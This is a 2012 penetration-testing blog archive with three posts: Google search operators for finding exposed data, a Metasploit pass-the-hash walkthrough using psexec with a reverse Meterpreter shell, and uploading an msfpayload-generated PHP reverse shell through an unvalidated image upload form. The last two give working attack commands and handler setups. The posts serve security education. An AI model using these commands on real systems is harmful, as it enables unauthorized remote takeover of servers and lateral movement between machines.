Thursday, April 5, 2012

Let Google Be Your Guide

Everyone knows that google is a great tool for finding information on the internet. What many don't realize is that google indexes many things that people didn't intend to make public, and makes them easily found with very little effort.
There are many search "operators" that every hacker/security person should know about, such as:
site:
filetype:
inurl:
intitle:
These operators can be used together as well as with normal search criteria.

One very simple search I performed yesterday led me to send this email today:

In case you are wondering, I ended up having a nice phone conversation with the company's Director of IT, and after hyperventilating for a few moments, he assured me that all their resources would be focused on taking care of this issue immediately.


Now, at this point you may be asking yourself, "It can't really be THAT EASY to find sensitive data with google, can it?"
Well, yes... yes it can.


Wednesday, April 4, 2012

Passing-The-Hash

To me there are few things as elegant as a nice pass-the-hash attack. This should drive home to each of us the risk associated with sharing passwords between systems, especially ones of different security requirements.
With Pass-the-hash, a simple un-cracked hash can be used to compromise other systems using the same account.


How it works:
Once we gain root access to a system, one of the first things we do is grab password hashes, (demonstrated in a previous post), and we typically immediately jump to cracking these hashes. BUT, even an un-cracked hash can be useful. If other systems use the same credentials, we can simply pass the hash along to that system and it will happily accept it and execute code for us.

One method for accomplishing this task is to use the Windows Credential Editor (wce). Written by Hernan Ochoa, it is available from www.ampliasecurity.com/research.html
This tool essentially allows you to edit the memory space of the running LSASS process, replacing your credentials with your victim's username and hash. You can then interact with other systems using any built in windows tool (net use, reg, psexec), and you'll effectively impersonate the victim.
***Newer versions of the tool even allow you to use stolen Kerberos tokens (with the -k and -K options).

Now, there is a simpler method for doing a pass-the-hash attack. Since version 3.1, metasploit has a built in method for it in the psexec exploit. It is VERY EASY, as I'll demonstrate.

We're going to use a hash we've gained from target1 (old vulnerable Windows server), to gain access to target2 (windows XPsp3, fully patched).

First, we dump target1 hashes using the hashdump command, and we copy off Administrator's hash.




Now we start up msfconsole.
The exploit we want is psexec, and for a payload we will use a reverse meterpreter shell, so we issue these commands:
use windows/smb/psexec
set PAYLOAD windows/meterpreter/reverse_tcp
We then set the variables for RHOST (target#2's IP) and LHOST (our IP).
set RHOST "target2 IP"
set LHOST "Our IP"

Now comes the magic. We set the user and password variables. Metasploit will automatically recognize if a hash is used for SMBPass and will use pass-the-hash rather than a password attempt.
set SMBUser Administrator
set SMBPass 73a87bf2afc9ca49b69e407095566351:1c31f...
That's it, run "exploit".




As you can see, this set up the reverse handler, connected to port 445 on target2, and using the hash we supplied it was able to execute our payload, giving us a meterpreter shell.

Because of one unmanaged legacy system, we were able to thoroughly own a completely patched box.

Tuesday, April 3, 2012

Deploying payload via PHP

Another fun way to deploy our meterpreter payload is with php.

Many webservers allow file uploads for things like image files to be displayed on the page. If the upload form neglects to verify the filetype this can allow us to upload a php file including our payload, and then trick the server into executing it. Alternatively, this payload could be injected into a forum post or some such thing.

First thing we do, is start up a meterpreter handler using the PHP method, like this:
/opt/metasploit-4.2.0/app/msfcli multi/handler payload=php/meterpreter/reverse_tcp lhost="LISTENER IP" lport="PORT" ExitOnSession=false J


Now we create our meterpreter php payload file. This command will create the php payload, and save it as m.php
/opt/metasploit-4.2.0/app/msfpayload php/meterpreter/reverse_tcp LHOST="LISTENER IP" LPORT="PORT" R > ~/m.php



Now we simply upload our php script like we would with an image file.



Then we navigate a browser to the location that server usually hosts images, and click on the file we just uploaded.


The server runs our m.php, causing the server to connect to our meterpreter handler on the specified port, and give us a shell on the target server. In this case, the process is running as the apache user.




We can now attempt to escalate privileges to gain root/SYSTEM, or we can just look around to see what all we've actually gained access to. Chances are that we have database or other files on this system that apache can access, or perhaps we'll just want to pivot through this target to attack something more sensitive behind the firewall that's not directly accessible from the outside world.